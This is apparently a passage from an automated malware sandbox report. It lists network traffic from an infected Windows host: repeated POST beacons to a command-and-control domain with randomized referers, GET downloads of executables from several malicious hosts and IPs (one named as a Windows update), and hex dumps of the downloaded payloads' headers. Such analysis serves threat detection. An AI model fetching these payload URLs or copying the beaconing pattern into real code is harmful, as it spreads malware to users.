10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:04 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 19:24:07 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 16:06:29 GMTETag: "6ff1c1-5d58cfc604e56"Accept-Ranges: bytesContent-Length: 7336385Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 25 0a 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49941 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49942 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cosjvii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efywdpqsv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vucofkhoh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glphw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oyaibbgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkvfp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ojffxid.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qctnjb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjrurwpaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cadsuqagh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://meblvhu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyxemdoi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syoeagb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlertqbun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blagu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kkmdou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbjnsl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ornpwmrp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rlhvsc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtrryuils.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scgsgbtih.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akyloc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahoawm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmfhwtjj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lfyjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sipqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jnlltxxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdbgmr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxwgswks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksfdeabujk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsgftsru.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfmcm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hiwcjtiwj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmqcl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opsdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdqepw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbbvlw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://giykrj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnoukoye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpoovg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://inyhvk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oabgm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iaimu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwapt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmtsfedit.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cvdnubldkb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crxfds.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yuhcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owybkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddkkslyotn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsbkvqwnoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmqdweotts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbcrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yldgixbqm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wlqxaynuuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
